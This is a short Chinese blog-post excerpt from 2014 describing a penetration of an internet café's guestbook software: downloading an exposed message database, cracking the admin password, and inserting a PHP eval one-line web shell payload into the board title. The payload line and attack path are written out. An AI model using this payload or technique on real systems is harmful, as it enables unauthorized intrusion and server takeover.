2014年3月28日
记一次网吧渗透(未完)
摘要: 网吧使用易游留言板,存在低级漏洞http://www.fucktest.com:18897/eyooboard/include/data/message.db得到数据库。文本文档打开,得到admin加密后密码解密后登录后台,留言板标题插入一句话。${${eval($_POST['cmd'])}}报错,本地搭建测试环境。查看configure.data.php。发现插进去是这样的。。等管理员重装留言... 阅读全文
posted @ 2014-03-28 01:02 test.cfs 阅读(419) 评论(0) 推荐(0) 编辑